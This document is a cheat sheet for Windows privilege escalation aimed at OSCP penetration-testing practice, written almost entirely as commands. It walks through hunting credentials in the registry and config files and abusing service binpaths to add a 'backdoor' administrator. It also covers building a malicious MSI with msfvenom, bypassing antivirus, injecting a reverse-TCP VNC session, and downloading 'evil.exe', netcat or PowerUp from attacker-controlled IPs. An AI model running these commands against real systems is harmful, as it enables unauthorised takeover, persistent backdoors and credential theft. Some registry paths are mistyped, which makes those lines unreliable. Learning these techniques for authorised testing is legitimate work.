Windows Priv Escalation

1. OSCP - Windows Priviledge Escalation
2. Information Gathering
3. + What system are we connected to?
4.  
5. systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
6.  
7. + Get the hostname and username (if available)
8.  
9. hostname
10. echo %username%
11.  
12. + Learn about your environment
13.  
14. SET
15. echo %PATH%
16.  
17. + List other users on the box
18.  
19. net users
20. net user <username>
21.  
22. + Networking/Routing Info
23.  
24. ipconfig /all
25. route print
26. arp -A
27.  
28. + Active Network Connections
29.  
30. netstat -ano
31.  
32. + Firewall Status (only on Win XP SP2 and above)
33.  
34. netsh firewall show state
35. netsh firewall show config
36. netsh advfirewall firewall show rule all
37.  
38. + Scheduled tasks
39.  
40. schtasks /query /fo LIST /v
41.  
42. + Check how Running processes link to started services
43.  
44. tasklist /SVC
45.  
46. + Windows services that are started:
47.  
48. net start
49.  
50. + Driver madness (3rd party drivers may have holes)
51.  
52. DRIVERQUERY
53.  
54. + Check systeminfo output against exploit-suggester
55.  
56. https://github.com/GDSSecurity/Windows-Exploit-Suggester/blob/master/windows-exploit-suggester.py
57. python windows-exploit-suggester.py -d 2017-05-27-mssb.xls -i systeminfo.txt
58.  
59. + Run windows-privesc script
60.  
61. https://github.com/pentestmonkey/windows-privesc-check
62.  
63. WMIC
64. Windows Management Instrumentation Command Line
65. Windows XP requires admin
66. + Use wmic_info.bat script for automation
67.  
68. http://www.fuzzysecurity.com/tutorials/files/wmic_info.rar
69.  
70.  
71. + System Info
72.  
73. wmic COMPUTERSYSTEM get TotalPhysicalMemory,caption
74. wmic CPU Get /Format:List
75.  
76. + Check patch level
77.  
78. wmic qfe get Caption,Description,HotFixID,InstalledOn
79.  
80. Look for privilege escalation exploits and look up their respective KB patch numbers. Such exploits include, but are not limited to, KiTrap0D (KB979682), MS11-011 (KB2393802), MS10-059 (KB982799), MS10-021 (KB979683), MS11-080 (KB2592799)
81. After enumerating the OS version and Service Pack you should find out which privilege escalation vulnerabilities could be present. Using the KB patch numbers you can grep the installed patches to see if any are missing
82. Search patches for given patch
83.  
84. wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB.." /C:"KB.."
85.  
86. Examples:
87.  
88. Windows 2K SP4 - Windows 7 (x86): KiTrap0D (KB979682)
89.  
90. wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB979682"
91.  
92. Windows Vista/2008 6.1.6000 x32,Windows Vista/2008 6.1.6001 x32,Windows 7 6.2.7600 x32,Windows 7/2008 R2 6.2.7600 x64. (no good exploit - unlikely Microsoft Windows Vista/7 - Elevation of Privileges (UAC Bypass))
93.  
94. wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB2393802"
95.  
96. Stored Credentials
97.  
98. Directories that contain the configuration files (however better check the entire filesystem). These files either contain clear-text passwords or in a Base64 encoded format.
99.  
100. C:\sysprep.inf
101. C:\sysprep\sysprep.xml
102. %WINDIR%\Panther\Unattend\Unattended.xml
103. %WINDIR%\Panther\Unattended.xml
104.  
105. When the box is connected to a Domain:
106. Look for Groups.xml in SYSVOL
107. GPO preferences can be used to create local users on domain. So passwords might be stored there. Any authenticated user will have read access to this file. The passwords is encryptes with AES. But the static key is published on the msdn website. Thus it can be decrypted.
108. Search for other policy preference files that can have the optional “cPassword” attribute set:
109.  
110. Services\Services.xml: Element-Specific Attributes
111. ScheduledTasks\ScheduledTasks.xml: Task Inner Element, TaskV2 Inner Element, ImmediateTaskV2 Inner Element
112. Printers\Printers.xml: SharedPrinter Element
113. Drives\Drives.xml: Element-Specific Attributes
114. DataSources\DataSources.xml: Element-Specific Attributes
115.  
116. Automated Tools
117. Metasploit Module
118.  
119. post/windows/gather/credentials/gpp
120. post/windows/gather/enum_unattend
121.  
122. Powersploit
123.  
124. https://github.com/PowerShellMafia/PowerSploit
125. Get-GPPPassword
126. Get-UnattendedInstallFile
127. Get-Webconfig
128. Get-ApplicationHost
129. Get-SiteListPassword
130. Get-CachedGPPPassword
131. Get-RegistryAutoLogon
132.  
133. Search filesystem:
134. Search for specific keywords:
135.  
136. dir /s *pass* == *cred* == *vnc* == *.config*
137.  
138. Search certain file types for a keyword
139.  
140. findstr /si password *.xml *.ini *.txt
141.  
142. Search for certain files
143.  
144. dir /b /s unattend.xml
145. dir /b /s web.config
146. dir /b /s sysprep.inf
147. dir /b /s sysprep.xml
148. dir /b /s *pass*
149. dir /b /s vnc.ini
150.  
151. Grep the registry for keywords (e.g. “passwords”)
152.  
153. reg query HKLM /f password /t REG_SZ /s
154. reg query HKCU /f password /t REG_SZ /s
155. reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
156. reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP"
157. reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"
158. reg query HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 /v password
159.  
160. Find writeable files
161.  
162. dir /a-r-d /s /b
163.  
164. /a is to search for attributes. In this case r is read only and d is directory. The minus signs negate those attributes. So we're looking for writable files only.
165. /s means recurse subdirectories
166. /b means bare format. Path and filename only.
167.  
168. Trusted Service Paths
169.  
170. List all unquoted service paths (minus built-in Windows services) on our compromised machine:
171.  
172. wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """
173.  
174. Suppose we found:
175.  
176. C:\Program Files (x86)\Program Folder\A Subfolder\Executable.exe
177.  
178. If you look at the registry entry for this service with Regedit you can see the ImagePath value is:
179.  
180. C:\Program Files (x86)\Program Folder\A Subfolder\Executable.exe
181.  
182. To be secure it should be like this:
183.  
184. “C:\Program Files (x86)\Program Folder\A Subfolder\Executable.exe”
185.  
186. When Windows attempts to run this service, it will look at the following paths in order and will run the first EXE that it will find:
187.  
188. C:\Program.exe
189. C:\Program Files.exe
190. C:\Program Files(x86)\Program Folder\A.exe
191. ...
192.  
193. Check permissions of folder path
194.  
195. icacls "C:\Program Files (x86)\Program Folder"
196.  
197. If we can write in the path we plant a backdoor with the same name with the service and restart the service.
198.  
199. Metasploit module:
200.  
201. exploit/windows/local/trusted_service_path
202.  
203. Vulnerable Services
204. Search for services that have a binary path (binpath) property which can be modified by non-Admin users - in that case change the binpath to execute a command of your own.
205. Note: Windows XP shipped with several vulnerable built-in services.
206. Use accesschk from SysInternals to search for these vulnerable services.
207.  
208. https://technet.microsoft.com/en-us/sysinternals/bb842062.aspx
209.  
210. For Windows XP, version 5.2 of accesschk is needed:
211.  
212. https://web.archive.org/web/20080530012252/http://live.sysinternals.com/accesschk.exe
213.  
214. accesschk.exe -uwcqv "Authenticated Users" * /accepteula
215. accesschk.exe -qdws "Authenticated Users" C:\Windows\ /accepteula
216. accesschk.exe -qdws Users C:\Windows\
217.  
218. Then query the service using Windows sc:
219.  
220. sc qc <vulnerable service name>
221.  
222. Then change the binpath to execute your own commands (restart of the service will most likely be needed):
223.  
224. sc config <vuln-service> binpath= "net user backdoor backdoor123 /add"
225. sc stop <vuln-service>
226. sc start <vuln-service>
227. sc config <vuln-service> binpath= "net localgroup Administrators backdoor /add"
228. sc stop <vuln-service>
229. sc start <vuln-service>
230.  
231. Note - Might need to use the depend attribute explicitly:
232.  
233. sc stop <vuln-service>
234. sc config <vuln-service> binPath= "c:\inetpub\wwwroot\runmsf.exe" depend= "" start= demand obj= ".\LocalSystem" password= ""
235. sc start <vuln-service>
236.  
237. Metasploit module:
238.  
239. exploit/windows/local/service_permissions
240.  
241. AlwaysInstallElevated
242. AlwaysInstallElevated is a setting that allows non-privileged users the ability to run Microsoft Windows Installer Package Files (MSI) with elevated (SYSTEM) permissions.
243. Check if these 2 registry values are set to “1”:
244.  
245. reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
246. reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
247.  
248. If they are, create your own malicious msi:
249.  
250. msfvenom -p windows/adduser USER=backdoor PASS=backdoor123 -f msi -o evil.msi
251.  
252. Then use msiexec on victim to execute your msi:
253.  
254. msiexec /quiet /qn /i C:\evil.msi
255.  
256. Metasploit module:
257.  
258. exploit/windows/local/always_install_elevated
259.  
260. Bypassing AV
261.  
262. Use Veil-Evasion
263. Create your own executable by “compiling” PowerShell scripts
264. Use Metasploit to substitute custom EXE and MSI binaries. You can set EXE::Custom or MSI::Custom to point to your binary prior to executing the module.
265.  
266. Getting GUI
267. + Using meterpreter, inject vnc session:
268.  
269. run post/windows/manage/payload_inject payload=windows/vncinject/reverse_tcp lhost=<yourip> options=viewonly=false
270.  
271. + Enable RDP:
272.  
273. netsh firewall set service RemoteDesktop enable
274.  
275. reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurentControlSet\Control\Terminal Server" /v fDenyTSConnections /t
276. REG_DWORD /d 0 /f
277. reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
278.  
279. sc config TermService start= auto
280. net start Termservice
281. netsh.exe
282. firewall
283. add portopening TCP 3389 "Remote Desktop"
284.  
285. OR:
286.  
287. netsh.exe advfirewall firewall add rule name="Remote Desktop - User Mode (TCP-In)" dir=in action=allow
288. program="%%SystemRoot%%\system32\svchost.exe" service="TermService" description="Inbound rule for the
289. Remote Desktop service to allow RDP traffic. [TCP 3389] added by LogicDaemon's script" enable=yes
290. profile=private,domain localport=3389 protocol=tcp
291.  
292. netsh.exe advfirewall firewall add rule name="Remote Desktop - User Mode (UDP-In)" dir=in action=allow
293. program="%%SystemRoot%%\system32\svchost.exe" service="TermService" description="Inbound rule for the
294. Remote Desktop service to allow RDP traffic. [UDP 3389] added by LogicDaemon's script" enable=yes
295. profile=private,domain localport=3389 protocol=udp
296.  
297. OR (meterpreter)
298.  
299. run post/windows/manage/enable_rdp
300.  
301. https://www.offensive-security.com/metasploit-unleashed/enabling-remote-desktop/
302. Python exploits
303. Compiling Python Exploits for Windows on Linux
304.  
305. install pyinstaller of windows with wine on Kali and then
306.  
307. wine ~/.wine/drive_c/Python27/Scripts/pyinstaller.exe --onefile 18176.py
308.  
309. run `pyinstaller` located under the same directory as Python scripts
310.  
311. wine ~/.wine/drive_c/Python27/Scripts/pyinstaller.exe --onefile HelloWorld.py
312.  
313. Execute with wine
314.  
315. wine ~/.wine/drive_c/dist/HelloWorld.exe
316.  
317. File Transfers
318. limit commands on shell to be non-interactive
319. https://blog.netspi.com/15-ways-to-download-a-file/
320. TFTP
321. Windows XP and Win 2003 contain tftp client. Windows 7 do not by default
322. tfpt clients are usually non-interactive, so they could work through an obtained shell
323.  
324. atftpd --daemon --port 69 /tftp
325.  
326. Windows> tftp -i 192.168.30.45 GET nc.exe
327.  
328. FTP
329. Windows contain FTP client but they are usually interactive
330. Solution: scripted parameters in ftp client: ftp -s
331. ftp-commands
332.  
333. echo open 192.168.30.5 21> ftp.txt
334. echo USER username password >> ftp.txt
335. echo bin >> ftp.txt
336. echo GET evil.exe >> ftp.txt
337. echo bye >> ftp.txt
338. ftp -s:ftp.txt
339.  
340. VBScript
341. wget-vbs script echo trick again, copy paste the commands in the shell
342.  
343. echo strUrl = WScript.Arguments.Item(0) > wget.vbs
344. echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
345. echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
346. echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
347. echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
348. echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
349. echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs
350. echo Err.Clear >> wget.vbs
351. echo Set http = Nothing >> wget.vbs
352. echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
353. echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
354. echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
355. echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
356. echo http.Open "GET",strURL,False >> wget.vbs
357. echo http.Send >> wget.vbs
358. echo varByteArray = http.ResponseBody >> wget.vbs
359. echo Set http = Nothing >> wget.vbs
360. echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
361. echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs
362. echo strData = "" >> wget.vbs
363. echo strBuffer = "" >> wget.vbs
364. echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
365. echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs
366. echo Next >> wget.vbs
367. echo ts.Close >> wget.vbs
368.  
369. cscript wget.vbs http://10.11.0.102/evil.exe test.txt
370.  
371. Powershell
372.  
373. echo $storageDir = $pwd > wget.ps1
374. echo $webclient = New-Object System.Net.WebClient >>wget.ps1
375. echo $url = "http://10.11.0.102/powerup.ps1" >>wget.ps1
376. echo $file = "powerup.ps1" >>wget.ps1
377. echo $webclient.DownloadFile($url,$file) >>wget.ps1
378.  
379. powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1
380.  
381. Webdav
382. On kali linux install wsgidav and cheroot
383.  
384. pip install wsgidav cheroot
385.  
386. Start the wsgidav on a restricted folder:
387.  
388. mkdir /tmp/webdav_folder
389. wsgidav --host=0.0.0.0 --port=80 --root=/tmp/webdav_folder
390.  
391. On Windows mount this folder using net use:
392.  
393. net use * http://YOUR_IP_ADDRESS/
394.  
395. Reference: https://github.com/mar10/wsgidav
396. BitsAdmin
397.  
398. bitsadmin /transfer n http://domain/file c:%homepath%file
399.  
400. debug.exe
401. First use upx or similar to compress the executable:
402.  
403. upx -9 nc.exe
404.  
405. Then use exe2bat to convert the executable into a series of echo commands that are meant to be copied pasted in the remote system:
406.  
407. wine exe2bat.exe nc.exe nc.txt
408.  
409. Then copy paste each command from nc.txt in the remote system. The commands will gradually rebuild the executable in the target machine.
410. certuril
411.  
412. certutil.exe -URL
413.  
414. will fetch ANY file and download it here:
415.  
416. C:\Users\subTee\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content